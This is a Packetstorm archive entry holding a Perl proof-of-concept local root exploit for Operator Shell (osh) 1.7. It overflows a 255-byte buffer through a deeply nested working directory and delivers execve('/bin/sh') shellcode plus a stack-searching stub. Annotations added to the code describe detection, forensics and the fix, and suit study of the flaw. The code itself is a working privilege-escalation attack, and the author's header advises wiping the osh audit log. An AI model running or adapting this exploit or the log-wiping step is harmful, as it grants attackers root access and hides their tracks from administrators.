x_osh2.pl.txt

2005-08-17T00:00:00
ID PACKETSTORM:39419
Type packetstorm
Reporter Charles Stevenson
Modified 2005-08-17T00:00:00

Description

                                        
                                            `#!/usr/bin/perl   
#######################################################################  
#  
# OSH 1.7 Exploit #2 (Gonna bang away at this until it's removed ;-)  
#  
# EDUCATIONAL purposes only.... :-)  
#  
# by Charles Stevenson (core) <core@bokeoa.com>  
#  
# Description:  
# The Operator Shell (Osh) is a setuid root, security enhanced, restricted  
# shell. It allows the administrator to carefully limit the access of special  
# commands and files to the users whose duties require their use, while  
# at the same time automatically maintaining audit records. The configuration  
# file for Osh contains an administrator defined access profile for each  
# authorized user or group.  
#  
# Problem (discovered by Solar Eclipse):  
#  
# handlers.c:364  
#  
# char temp3[255];  
#  
# if (*file!='/') {  
# getcwd(temp3, MAXPATHLEN);  
# strcat(temp3,"/");  
# strcat(temp3,file);  
# }  
#  
# ...  
#  
# "If the length of the current working directory plus the length of the  
# file name is longer than 255 bytes, there will be a buffer overflow in  
# temp3[]. The size limit of the current directory is MAXPATHLEN, which is  
# defined as 1024 on modern Linux systems. The limit for the file name is  
# MAXFNAME, defined as 32 in struct.h:116."  
#  
# "This code is in the writable() function, which is called by the handlers  
# for built-in cp, vi, rm and test commands, as well as the redirect  
# function." -- Solar Eclipse  
#  
# Risk: Medium since user would have to be in the operator group which  
# the admin would have to grant explicitly and I assume would be  
# a trustworthy individual ;-)  
#  
# Solution:  
# apt-get --purge remove osh  
#  
# greetz to solar eclipse, nemo, andrewg, cnn, arcanum, mercy, amnesia,   
# banned-it, capsyl, sloth, redsand, KF, akt0r, MRX, salvia, truthix, ...  
#  
# irc.pulltheplug.org (#social)  
# 0dd: much <3 & respect  
#   
# 08/12/05 - PoC causes segv with 0x41414141 eip  
# 08/16/05 - PoC _exit(0) ... need shellcode to get past char filters  
# 08/16/04 - Later that night... or morning... ROOTSHELL!! Woot! PTP joint  
# effort on the shellcode.  
#  
# I still find it hard to imagine that anyone would use osh  
# The code is basically beyond repair. Sudo is better.... :-)  
#  
# Don't forget to clean /var/log/osh.log  
#  
#######################################################################  
# PRIVATE - DO NOT DISTRIBUTE - PRIVATE #  
#######################################################################  
  
  
# Yanked from one of KF's exploits.. werd brotha ;-) I'm lazy..  
#
# Stage 2 payload: (511-45) = 466 NOP bytes followed by the 45-byte stub,
# 511 bytes in total. It is never written into the overflowed buffer; it is
# exported below as $ENV{HELLCODE} so that it sits on the stack of the
# setuid child, and the much smaller stage-1 stub in the file name jumps
# to it. Defender note: this only works because the environment is passed
# through to the setuid process unchanged -- presumably osh does not scrub
# it (not verified here); a setuid binary should start from a known-clean
# environment rather than trust whatever its caller exported.
# NOTE: the script runs without `use strict; use warnings;`, so $sc, $ptp_sc,
# $key and $file are all package globals.
$sc = "\x90" x (511-45) .  
  
# 45 bytes by anthema. 0xff less   
"\x89\xe6" . # /* movl %esp, %esi */   
"\x83\xc6\x30" . # /* addl $0x30, %esi */   
"\xb8\x2e\x62\x69\x6e" . # /bin /* movl $0x6e69622e, %eax */   
"\x40" . # /* incl %eax */   
"\x89\x06" . # /* movl %eax, (%esi) */   
"\xb8\x2e\x73\x68\x21" . # /sh /* movl $0x2168732e, %eax */   
"\x40" . # /* incl %eax */   
"\x89\x46\x04" . # /* movl %eax, 0x04(%esi) */   
"\x29\xc0" . # /* subl %eax, %eax */   
"\x88\x46\x07" . # /* movb %al, 0x07(%esi) */   
"\x89\x76\x08" . # /* movl %esi, 0x08(%esi) */   
"\x89\x46\x0c" . # /* movl %eax, 0x0c(%esi) */   
"\xb0\x0b" . # /* movb $0x0b, %al */   
"\x87\xf3" . # /* xchgl %esi, %ebx */   
"\x8d\x4b\x08" . # /* leal 0x08(%ebx), %ecx */   
"\x8d\x53\x0c" . # /* leal 0x0c(%ebx), %edx */   
"\xcd\x80"; # /* int $0x80 */   
  
# 0day shellcodez....  
#  
# Nemo's idea... PTP #social collaborative effort. Searches the stack  
# until it finds a nopsled and executes the shellcode  
#
# Stage 1 stub, 15 bytes. It travels inside the file name, which the header
# says is capped at MAXFNAME (32) and has to survive the character filters
# listed at the XXX comment further down -- that is why the real payload is
# parked in the environment instead of in the file name.
$ptp_sc =   
  
"\x61\x54\x59\x81\x39\x90\x90" .  
"\x90\x90\x74\x02\xeb\xf3\x54" .  
"\xc3";  
  
# _exit(0);  
# Earlier PoC payload (see the 08/16/05 changelog line in the header); kept
# commented out by the author as the minimal "did control reach us" check.
#"\x31\xc0\x31\xdb\x40\xcd\x80";  
  
# Banner only; no functional role.
print "\nOperator Shell (osh) 1.7-13 root exploit\n";  
print "----------------------------------------------\n";  
print "Written by Charles Stevenson <core\@bokeoa.com>\n";  
print "This exploit would not have been near as fun without\n";  
print "the pulltheplug.org community.\n\n";  
  
# Clear out the environment.   
# Presumably done so the child's stack layout stays predictable for the
# fixed return address below (only the three variables set next remain).
# Detection angle: a setuid process started with a near-empty environment
# that contains one large, mostly non-printable variable is anomalous on
# its own. ($key is undeclared; `delete @ENV{keys %ENV}` or `%ENV = ()`
# would be the idiomatic form, but the loop is left as written.)
foreach $key (keys %ENV) { delete $ENV{$key}; }   
  
# Setup simple env  
# "$sc" is a needless stringification of a string; harmless.
$ENV{"HELLCODE"} = "$sc";   
$ENV{"TERM"} = "linux";   
$ENV{"PATH"} = "/usr/local/bin:/usr/bin:/bin";   
  
# Unchecked chdir: if /tmp is unavailable the script silently continues in
# the wrong directory. None of the chdir/mkdir calls below check their
# return value either, so a pre-existing directory tree changes the path
# length without any error.
chdir("/tmp/");  
  
# Create the payload...  
# The trigger is the working directory, not the file: three nested
# components of 255, 255 and 118 bytes give getcwd() a result of about
# 635 bytes ("/tmp" + "/A"*255 + "/B"*255 + "/C"*118), far beyond the
# 255-byte temp3[] that writable() (handlers.c:364, quoted in the header)
# fills with getcwd(temp3, MAXPATHLEN) followed by two unbounded strcat()s.
# Fix on the osh side would be bounded construction (snprintf/strlcat into
# a buffer sized for MAXPATHLEN + MAXFNAME + 2, or rejecting longer paths);
# the header's own verdict is to remove the package.
# Forensics: directories named with 255 repeated characters under /tmp are
# an unusual, durable artifact (cleanup below is best-effort only).
mkdir("A"x255,0755);  
chdir("A"x255);  
mkdir("B"x255,0755);  
chdir("B"x255);  
mkdir("C"x118,0755);  
chdir("C"x118);  
  
#XXX: Return address can't have: 0x09 0x0a 0x20 0x22 0x24 0x26  
# (what made this fun) 0x3b 0x3c 0x3e 0x7c 0xff  
  
# File name = 4-byte little-endian address (pack "l") + the 15-byte stage-1
# stub, 19 bytes, inside the MAXFNAME limit. 0x804e36c is presumably an
# address inside the author's non-relocatable osh 1.7-13 build (the
# "inputfp + 12" remark is the author's note on what it points at), so the
# PoC is build-specific; the two commented lines above it are the earlier
# crash-test values from the header's changelog.
#$file = pack("l",0xdeadbeef) . "core";  
#$file = pack("l",0x804e36c) . "core";  
$file = pack("l",0x804e36c) . $ptp_sc; # inputfp + 12  
  
# Both system() calls interpolate $file into a shell command line; the
# single quotes are what keep the binary bytes intact, which is why the
# characters listed at the XXX comment had to be avoided (an unquoted byte
# such as ';' or '|' would split the command). Defender note: "osh test -w"
# is one of the builtins the header says reaches writable(), and osh keeps
# an audit log (/var/log/osh.log per the header) -- an entry whose file name
# holds non-printable bytes, or whose cwd is hundreds of bytes long, is the
# signal to look for, and a log that is later truncated or missing after
# such an entry is a stronger one.
system("touch '$file'");  
system("/usr/sbin/osh test -w '$file'");  
  
# Best-effort cleanup: chdir is unchecked, and the glob only matches the
# top-level A... directory from /tmp, so a failed earlier chdir leaves the
# tree in place.
print("cleaning up /tmp\n");  
chdir("../../../");  
system("rm -rf AAAA*/");  
  
# EOF  
  